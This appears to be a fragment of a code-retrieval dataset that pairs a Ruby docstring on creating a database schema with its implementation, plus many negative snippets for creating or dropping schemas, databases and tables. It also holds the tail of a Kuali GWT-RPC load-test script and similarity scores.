Fee|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|4|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|6|pilotCourse|revenues|%%_#{opts[:revenues_id_name]}%%|REVENUE|%%_#{opts[:revenue_id_name]}%%|specialTopicsCourse|startTerm|kuali.atp.FA2008-2009|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|variations|versionInfo|currentVersionStart|sequenceNumber|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Fall Semester of 2008|Standard final Exam|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|8|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|38|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|29|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|30|14|31|8|32|14|33|8|34|17|5|6|7|0|5|8|35|14|36|8|37|38|39|3759152200|1288490188800|0|8|40|14|36|8|41|38|39|3759152200|1288490188800|0|8|42|14|43|-45|-51|8|44|14|45|8|46|14|47|8|48|14|49|-41|-43|-37|-39|8|50|17|5|6|7|0|0|-37|-73|8|51|17|5|6|7|0|8|8|52|14|43|8|53|17|5|6|7|0|2|8|54|14|55|8|56|14|55|-79|-83|8|30|14|57|8|58|14|33|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498783321|1309965025280|601000000|8|40|14|59|8|41|38|39|3498791687|1309965025280|967000000|8|42|14|60|-79|-95|8|44|14|61|8|46|14|62|8|48|14|63|-37|-77|-33|-35|-1|-31|8|64|14|65|8|66|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|67|14|68|8|30|14|69|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3479039543|1309965025280|823000000|8|40|14|59|8|41|38|39|3479039543|1309965025280|823000000|8|42|14|43|-125|-131|8|70|17|5|6|7|0|1|18|-15|14|68|-125|-147|8|46|14|62|8|48|14|71|8|21|17|5|6|7|0|1|8|48|17|5|6|7|0|1|8|22|14|72|-159|-161|-125|-157|-121|-123|-1|-119|8|73|17|5|6|7|0|0|-1|-167|8|74|17|5|6|7|0|1|8|56|14|75|-1|-171|8|76|17|5|6|7|0|3|8|77|14|78|8|79|80|19|2|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|81|-188|-190|-179|-186|-1|-177|8|82|38|39|470887936|1219770712064|0|8|83|17|5|6|7|0|1|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|85|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-220|-222|-209|-218|-205|-207|-201|-203|-1|-199|8|92|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|93|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|94|80|19|100|8|95|14|96|-238|-240|-234|-236|8|97|14|98|8|30|14|99|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498789104|1309965025280|384000000|8|40|14|59|8|41|38|39|3498791612|1309965025280|892000000|8|42|14|100|-234|-253|8|101|14|102|8|21|17|5|6|7|0|2|8|101|17|5|6|7|0|1|8|22|14|103|-273|-275|8|97|17|5|6|7|0|1|8|22|14|104|-273|-281|-234|-271|-230|-232|-1|-228|8|105|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|106|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|107|14|108|8|109|17|5|6|7|0|3|8|110|14|111|8|112|14|113|8|21|17|5|6|7|0|1|8|112|17|5|6|7|0|1|8|22|14|114|-315|-317|-307|-313|-301|-305|8|115|80|-246|8|76|17|5|6|7|0|3|8|77|14|116|8|79|80|19|13|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|117|-336|-338|-327|-334|-301|-325|8|30|14|118|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498779786|1309965025280|66000000|8|40|14|59|8|41|38|39|3498791652|1309965025280|932000000|8|42|14|119|-301|-346|8|46|14|62|8|120|17|5|6|7|0|0|-301|-364|8|21|17|5|6|7|0|1|8|107|17|5|6|7|0|1|8|22|14|121|-370|-372|-301|-368|-297|-299|-293|-295|8|30|14|122|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498779778|1309965025280|58000000|8|40|14|59|8|41|38|39|3498791646|1309965025280|926000000|8|42|14|119|-293|-380|8|46|14|62|8|123|17|5|6|7|0|0|-293|-398|8|48|14|124|-289|-291|-1|-287|8|125|17|5|6|7|0|2|18|-15|14|126|8|21|17|5|6\"\n contents3 = \"|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|127|-412|-414|-406|-410|-1|-404|8|30|14|128|8|129|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|130|14|131|8|21|17|5|6|7|0|1|8|130|17|5|6|7|0|1|8|22|14|132|-434|-436|-428|-432|-424|-426|-1|-422|8|133|17|5|6|7|0|0|-1|-442|8|134|14|135|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498775348|1309965025280|628000000|8|40|14|59|8|41|38|39|3498791612|1309965025280|892000000|8|42|14|136|-1|-448|8|137|10|-5|8|138|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|139|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-491|-493|-480|-489|-476|-478|-472|-474|8|97|14|140|8|30|14|141|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498789104|1309965025280|384000000|8|40|14|59|8|41|38|39|3498791612|1309965025280|892000000|8|42|14|100|-472|-503|-468|-470|-1|-466|8|142|10|-5|8|143|14|144|8|46|14|62|8|145|14|146|8|123|17|5|6|7|0|2|18|-15|14|147|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|148|-535|-537|-529|-533|-1|-527|8|149|14|150|8|48|14|151|8|120|17|5|6|7|0|2|18|-15|14|152|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|153|-555|-557|-549|-553|-1|-547|8|154|17|5|6|7|0|2|18|-15|14|87|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|91|-571|-573|-565|-569|-1|-563|8|155|17|5|6|7|0|0|-1|-579|8|156|17|5|6|7|0|3|8|157|38|39|3498775348|1309965025280|628000000|8|158|89|90|1|0|8|159|14|160|-1|-583|8|21|17|5|6|7|0|3|8|143|17|5|6|7|0|1|8|22|14|161|-597|-599|8|145|17|5|6|7|0|1|8|22|14|146|-597|-605|8|13|17|5|6|7|0|1|8|22|14|162|-597|-611|-1|-595|8|163|17|5|6|7|0|12|8|164|14|165|8|30|14|166|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498775596|1309965025280|876000000|8|40|14|59|8|41|38|39|3498792455|1309965025280|735000000|8|42|14|167|-619|-625|8|44|14|65|8|168|17|5|6|7|0|1|18|-15|14|128|-619|-643|8|169|14|170|8|171|17|5|6|7|0|0|-619|-651|8|172|17|5|6|7|0|0|-619|-655|8|173|14|174|8|46|14|175|8|48|14|176|8|177|14|178|-1|-617|8|179|17|5|6|7|0|1|8|180|17|5|6|7|0|0|-669|-671|-1|-667|0|0|\"\n end\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}#{contents3}\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add_thinktime(5)\n\n\n # Submit to worflow\n if(opts[:submit])\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|submitDocumentWithId|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n end\n \n \n end",
"def call(_obj, args, _ctx)\n create_table = Table.new(\n name: args[:name],\n quantity: args[:quantity],\n )\n return create_table if create_table.save\n GraphQL::ExecutionError.new(\"invalid data\")\n end"
] |
[
"0.7619942",
"0.6248246",
"0.62357014",
"0.6163669",
"0.584984",
"0.5509536",
"0.53380984",
"0.5277645",
"0.5253506",
"0.52450913",
"0.51921475",
"0.5182267",
"0.51447105",
"0.50993854",
"0.50829625",
"0.5075793",
"0.5061333",
"0.5004424",
"0.5002058",
"0.5002025",
"0.49873585",
"0.49818942",
"0.49179366",
"0.4885991",
"0.48857856",
"0.48817885",
"0.48758706",
"0.48546708",
"0.48505613",
"0.48435307",
"0.48388478",
"0.48273984",
"0.48180926",
"0.4808999",
"0.48026067",
"0.48005655",
"0.47836033",
"0.47801012",
"0.47783968",
"0.47757152",
"0.47748348",
"0.47721782",
"0.47600976",
"0.4750046",
"0.47382045",
"0.47301733",
"0.47262704",
"0.47237578",
"0.470314",
"0.4678737",
"0.46637592",
"0.46630535",
"0.46387124",
"0.46338248",
"0.46327725",
"0.46191302",
"0.46041375",
"0.45979607",
"0.45965225",
"0.4594864",
"0.45880434",
"0.45845386",
"0.45776516",
"0.45653093",
"0.45544195",
"0.45533323",
"0.4553206",
"0.45465216",
"0.45437902",
"0.45431778",
"0.4532851",
"0.4531046",
"0.45264316",
"0.4523669",
"0.45235598",
"0.4497907",
"0.4497907",
"0.44947562",
"0.44929785",
"0.44896805",
"0.44893065",
"0.44885492",
"0.4487874",
"0.44789454",
"0.44695464",
"0.446927",
"0.44592237",
"0.44576445",
"0.44488746",
"0.44480917",
"0.44460526",
"0.44399783",
"0.44327098",
"0.44294077",
"0.4427759",
"0.44042307",
"0.44030744",
"0.4400796",
"0.4399003",
"0.43906564"
] |
0.7850673
|
0
|
Create a schema in the database. Arguments: name :: Name of the schema (e.g. admin) opts :: options hash: :if_not_exists :: Don't raise an error if the schema already exists (PostgreSQL 9.3+) :owner :: The owner to set for the schema (defaults to current user if not specified)
|
def create_schema(name, opts=OPTS)
self << create_schema_sql(name, opts)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_schema schema_name\n execute \"CREATE SCHEMA #{quote_schema_name(schema_name)}\"\n end",
"def create_schema(name)\n sql = %{CREATE SCHEMA \"#{name}\"}\n ActiveRecord::Base.connection.execute sql\n end",
"def create_database(name, _options = {})\n execute(\"CREATE SCHEMA `#{name}`\")\n end",
"def create_schema(schema_name, pg_username = nil)\n if pg_username.nil? # AR 4.0 compatibility - accepts only single argument\n execute \"CREATE SCHEMA #{schema_name}\"\n else\n execute(\"CREATE SCHEMA \\\"#{schema_name}\\\" AUTHORIZATION \\\"#{pg_username}\\\"\")\n end\n end",
"def create_database(name, options = {})\n execute(\n \"CREATE SCHEMA #{quote_table_name(name)}\",\n SCHEMA_LOG_NAME\n )\n end",
"def create_schema(schema)\n execute \"CREATE SCHEMA #{schema}\", 'Create Schema'\n end",
"def create!(db, colls = nil)\n db.in_transaction do |conn|\n raise StandardError.new(\"Schema #{name} already created!\") unless schema_tables(conn).empty?\n end\n\n osm2pgsql_exec db, \"'#{empty_file}'\", \"creating osm2pgsql schema\"\n end",
"def create_schema(schema)\n ActiveRecord::Base.connection.execute(\"CREATE SCHEMA #{schema}\")\n end",
"def create_database(name, options = {})\n options = { encoding: 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.inject(\"\") do |memo, (key, value)|\n memo += case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_schema(args={})\n args[:force] ||= false\n\n ActiveRecord::Schema.define do\n create_table :users, force: args[:force] do |t|\n t.string :jid, limit: 512, null: false\n t.string :name, limit: 256, null: true\n t.string :password, limit: 256, null: true\n t.text :vcard, null: true\n end\n add_index :users, :jid, unique: true\n\n create_table :contacts, force: args[:force] do |t|\n t.integer :user_id, null: false\n t.string :jid, limit: 512, null: false\n t.string :name, limit: 256, null: true\n t.string :ask, limit: 128, null: true\n t.string :subscription, limit: 128, null: false\n end\n add_index :contacts, [:user_id, :jid], unique: true\n\n create_table :groups, force: args[:force] do |t|\n t.string :name, limit: 256, null: false\n end\n add_index :groups, :name, unique: true\n\n create_table :contacts_groups, id: false, force: args[:force] do |t|\n t.integer :contact_id, null: false\n t.integer :group_id, null: false\n end\n add_index :contacts_groups, [:contact_id, :group_id], unique: true\n\n create_table :fragments, force: args[:force] do |t|\n t.integer :user_id, null: false\n t.string :root, limit: 256, null: false\n t.string :namespace, limit: 256, null: false\n t.text :xml, null: false\n end\n add_index :fragments, [:user_id, :root, :namespace], unique: true\n end\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(encoding: 'utf8')\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n ''\n end\n end\n\n execute(\"CREATE DATABASE #{quote_table_name(name)}#{option_string}\")\n end",
"def create_database(name, options = {})\n options = { :encoding => 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :collation\n \" LC_COLLATE = '#{value}'\"\n when :ctype\n \" LC_CTYPE = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(:encoding => \"utf8\")\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_schema\n PgTools.create_schema id unless PgTools.schemas.include? id.to_s\n end",
"def create(schema,and_migrate = true)\n conn = ActiveRecord::Base.connection\n conn.execute(\"CREATE SCHEMA #{schema}\") unless conn.schema_exists? schema\n self.migrate(schema) if and_migrate\n end",
"def create_database_sql(name, opts = {})\n \"CREATE DATABASE #{quote_identifier(name)}\"\n end",
"def create_database(name)\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def create_schema\n Apartment::Database.create(subdomain)\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def create\n database.command({ :create => name }.merge(options))\n end",
"def schema(schema_name, stream)\n stream << \" create_schema \\\"#{schema_name}\\\"\\n\"\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def ensure_tenant_schema_exists\n logger.info \"Creating new schema '#{db_name}' ...\"\n if schema_exists?\n logger.info \"Schema '#{db_name}' already existed!\"\n else\n Apartment::Tenant.create(db_name)\n end\n rescue Apartment::SchemaExists => e\n logger.info \"#{e.class.name}: Schema '#{db_name}' already existed!\"\n end",
"def set_schema(name = nil, &block)\n set_dataset(db[name]) if name\n @schema = db.create_table_generator(&block)\n set_primary_key(@schema.primary_key_name) if @schema.primary_key_name\n end",
"def drop_schema(schema_name, options = {})\n execute \"DROP SCHEMA#{' IF EXISTS' if options[:if_exists]} #{quote_schema_name(schema_name)} CASCADE\"\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def schema(name)\n get(\"schemas/#{name}/\", \"schema\")\n end",
"def apply_schema(name, type, options={})\n raise NotImplementedError\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def create\n @schema = Schema.new(schema_params)\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, notice: 'Schema was successfully created.' }\n format.json { render :show, status: :created, location: @schema }\n else\n format.html { render :new }\n format.json { render json: @schema.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @schema = Schema.new(schema_params)\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, notice: 'Schema was successfully created.' }\n format.json { render :show, status: :created, location: @schema }\n else\n format.html { render :new }\n format.json { render json: @schema.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_database(name, options = {})\n if options[:collation]\n execute \"CREATE DATABASE #{quote_table_name(name)} DEFAULT COLLATE #{quote_table_name(options[:collation])}\"\n elsif options[:charset]\n execute \"CREATE DATABASE #{quote_table_name(name)} DEFAULT CHARACTER SET #{quote_table_name(options[:charset])}\"\n elsif row_format_dynamic_by_default?\n execute \"CREATE DATABASE #{quote_table_name(name)} DEFAULT CHARACTER SET `utf8mb4`\"\n else\n raise \"Configure a supported :charset and ensure innodb_large_prefix is enabled to support indexes on varchar(255) string columns.\"\n end\n end",
"def create_publication(name, all_tables = false, tables = [], options = {})\n base_command = \"CREATE PUBLICATION #{connection.quote_ident(name)}\"\n if all_tables\n base_command << \" FOR ALL TABLES\"\n elsif !tables.empty?\n base_command << \" FOR TABLE #{safe_list(tables)}\"\n end\n typed_exec(@command_builder.command_with_options(base_command, \"WITH\", options))\n end",
"def drop_schema(name, opts=OPTS)\n self << drop_schema_sql(name, opts)\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def create_extension(extension_name, options = {})\n options = CREATE_EXTENSION_DEFAULTS.merge(options.symbolize_keys)\n\n sql = ['CREATE EXTENSION']\n sql << 'IF NOT EXISTS' if options[:if_not_exists]\n sql << %Q{\"#{extension_name.to_s}\"}\n sql << \"SCHEMA #{options[:schema_name]}\" if options[:schema_name].present?\n sql << \"VERSION '#{options[:version]}'\" if options[:version].present?\n sql << \"FROM #{options[:old_version]}\" if options[:old_version].present?\n\n sql = sql.join(' ')\n execute(sql)\n end",
"def create\n @schema = Schema.new(params[:schema])\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, notice: 'Schema was successfully created.' }\n format.json { render json: @schema, status: :created, location: @schema }\n else\n format.html { render action: \"new\" }\n format.json { render json: @schema.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_schema schema_id, type, definition, options = {}\n schema = Google::Cloud::PubSub::V1::Schema.new(\n type: type,\n definition: definition\n )\n schemas.create_schema parent: project_path(options),\n schema: schema,\n schema_id: schema_id\n end",
"def add_schema(export_type = nil)\n mig_text = schema_generator_script(db_migration_schema, 'create')\n write_db_migration mig_text, \"#{db_migration_schema}_schema\", export_type: export_type\n end",
"def create\n @schema = Schema.new(params[:schema])\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, :notice => 'Schema was successfully created.' }\n format.json { render :json => @schema, :status => :created, :location => @schema }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @schema.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def schema_exists?(name)\n select_value(\"SELECT COUNT(*) FROM pg_namespace WHERE nspname = '#{name}'\", 'SCHEMA').to_i > 0\n end",
"def schema_exists?(name)\n select_value(\"SELECT COUNT(*) FROM pg_namespace WHERE nspname = '#{name}'\", 'SCHEMA').to_i > 0\n end",
"def create_table!(name, &block)\n drop_table(name) rescue nil\n create_table(name, &block)\n end",
"def create_database!(name=nil)\n db = if name\n self.server.database!(db_name_with_prefix(name))\n else\n self.database!\n end\n create_rotation_filter(db)\n if self.respond_to?(:design_doc)\n design_doc.sync!(db)\n # or maybe this?:\n #self.design_docs.each do |design|\n # design.migrate(to_db)\n #end\n end\n return db\n end",
"def create_db(options)\n info \"Created database '#{options[:name]}'\"\n end",
"def create_db name\n \n req = Net::HTTP::Put.new \"/#{name}\"\n ret = @http.request req\n \n puts \"Creating Database #{name} => #{ret.msg} (#{ret.code})\\n\"\n \n end",
"def create_mysql_database(schema=\"\")\n @mysql_database = true\n MysqlUtils.create_mysql_database(database_name, schema)\n end",
"def register(name)\n Schemas.register(name, self)\n end",
"def schema_generator_script(schema_name, mode = 'create', owner: DefaultSchemaOwner)\n cname = \"#{mode}_#{schema_name}_schema_#{migration_version}\".camelize\n\n <<~CONTENT\n require 'active_record/migration/app_generator'\n class #{cname} < ActiveRecord::Migration[5.2]\n include ActiveRecord::Migration::AppGenerator\n\n def change\n self.schema = '#{schema_name}'\n self.owner = '#{owner}'\n create_schema\n end\n end\n CONTENT\n end",
"def create_search_schema(name, content)\n @data[:search_schemas][name] = {:name => name, :content => content}\n true\n end",
"def create_database(name)\n @logger.unknown(\"ODBCAdapter#create_database>\") if @trace\n @logger.unknown(\"args=[#{name}]\") if @trace\n execute \"CREATE DATABASE #{name}\"\n rescue Exception => e\n @logger.unknown(\"exception=#{e}\") if @trace\n raise\n end",
"def create_migration(name, options = {})\n CreateMigration.perform(\n name,\n options\n )\n end",
"def createUserTable\n @Handle.execute( @UserSchema ) \n end",
"def create(name)\n package = Package.new(name)\n package.name = name\n package.version = '1.0.0'\n empty_directory(name)\n empty_directory(File.join(name, 'operations'))\n empty_directory(File.join(name, 'resources'))\n template('metadata.rb.erb', File.join(name, 'metadata.rb'))\n\n if options[:vagrant]\n template('Vagrantfile.erb', File.join(name, 'Vagrantfile'))\n end\n\n if options[:docker]\n template('Dockerfile.erb.erb', File.join(name, 'Dockerfile.erb'))\n end\n end",
"def create_table_prefix_sql(name, options)\n prefix_sql = if options[:temp]\n raise(Error, \"can't provide both :temp and :unlogged to create_table\") if options[:unlogged]\n raise(Error, \"can't provide both :temp and :foreign to create_table\") if options[:foreign]\n temporary_table_sql\n elsif options[:foreign]\n raise(Error, \"can't provide both :foreign and :unlogged to create_table\") if options[:unlogged]\n 'FOREIGN '\n elsif options[:unlogged]\n 'UNLOGGED '\n end\n\n \"CREATE #{prefix_sql}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table_prefix_sql(name, options)\n \"CREATE #{temporary_table_sql if options[:temp]}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table(*args, &block)\n db.create_table(name,*args, &block)\n end",
"def add_synonym(name, table_name, options = {})\n sql = \"CREATE\"\n if options[:force] == true\n sql << \" OR REPLACE\"\n end\n sql << \" SYNONYM #{quote_table_name(name)} FOR #{quote_table_name(table_name)}\"\n execute sql\n end",
"def create\n @schema_table = SchemaTable.new(schema_table_params)\n\n respond_to do |format|\n if @schema_table.save\n format.html { redirect_to @schema_table, notice: 'Schema table was successfully created.' }\n format.json { render :show, status: :created, location: @schema_table }\n else\n format.html { render :new }\n format.json { render json: @schema_table.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_database_schema!\n \n if file_format.class.const_defined?('Database')\n @orm_module = file_format.class.const_get('Database')\n else\n @orm_module = file_format.class.const_set('Database', Module.new)\n end\n\n create_request_table_and_class\n create_warning_table_and_class\n \n file_format.line_definitions.each do |name, definition|\n create_database_table(name, definition)\n create_activerecord_class(name, definition)\n end\n end",
"def recreate_database(name, options = {})\n drop_database(name)\n create_database(name, options)\n end",
"def create!(con)\n con.exec create_stmt\n end",
"def create(name)\n url = prefix + \"create\" + \"&name=#{name}\"\n return response(url)\n end",
"def create(name)\n url = prefix + \"create\" + \"&name=#{name}\"\n return response(url)\n end",
"def create (name, attrs = {})\n factory_by_name(name).create(attrs)\n end",
"def create (name, attrs = {})\n factory_by_name(name).create(attrs)\n end",
"def drop_schema schema_name\n execute \"DROP SCHEMA #{schema_name} CASCADE\"\n end",
"def initialize_schema!\n Schema.create(self)\n end",
"def schema(table_name = nil, opts={})\n table_name = table_name.to_sym if table_name\n if opts[:reload] && @schemas\n if table_name\n @schemas.delete(table_name)\n else\n @schemas = nil\n end\n end\n\n if @schemas\n if table_name\n return @schemas[table_name] if @schemas[table_name]\n else\n return @schemas\n end\n end\n\n if table_name\n @schemas ||= {}\n if respond_to?(:schema_parse_table, true)\n @schemas[table_name] ||= schema_parse_table(table_name, opts)\n else\n raise Error, 'schema parsing is not implemented on this database'\n end\n else\n if respond_to?(:schema_parse_tables, true)\n @schemas = schema_parse_tables(opts)\n elsif respond_to?(:schema_parse_table, true) and respond_to?(:tables, true)\n tables.each{|t| schema(t, opts)}\n @schemas\n else\n raise Error, 'schema parsing is not implemented on this database'\n end\n end\n end",
"def create(database_id:, name:)\n path = '/databases'\n\n if database_id.nil?\n raise Appwrite::Exception.new('Missing required parameter: \"databaseId\"')\n end\n\n if name.nil?\n raise Appwrite::Exception.new('Missing required parameter: \"name\"')\n end\n\n params = {\n databaseId: database_id,\n name: name,\n }\n \n headers = {\n \"content-type\": 'application/json',\n }\n\n @client.call(\n method: 'POST',\n path: path,\n headers: headers,\n params: params,\n response_type: Models::Database\n )\n end",
"def recreate_database(name, options = {}) #:nodoc:\n drop_database(name)\n create_database(name, options)\n end",
"def create_table_with_storing_name(table_name, options = {}, &block)\n @@table_name = table_name\n create_table_without_storing_name table_name, options, &block\n AirBlade::Migrations::SchemaDefinitions.foreign_keys = []\n end",
"def create(options = {})\n options[:name] ||= SecureRandom.hex\n\n create_options = { p: port }\n create_options[:c] = options[:name] if options[:name]\n create_options[:d] = options[:dir] if options[:dir]\n exec(\"create\", create_options)\n\n options[:name]\n end",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def create_database(db_name)\n ret = PureHailDB.ib_database_create(db_name)\n if ret != true\n check_return_code(PureHailDB::DbError[:DB_ERROR])\n end\n end",
"def create_table?(name, options=OPTS, &block)\n if options[:partition_of]\n create_table(name, options.merge!(:if_not_exists=>true), &block)\n return\n end\n\n super\n end",
"def create_database(name, charset)\n database = ::MySQL::Database.create(name, charset)\n !database.nil?\n end",
"def alter_sequence_schema(name, schema, options = {})\n execute(\"ALTER SEQUENCE #{quote_sequence(name)} SET SCHEMA #{quote_schema(schema)};\")\n end",
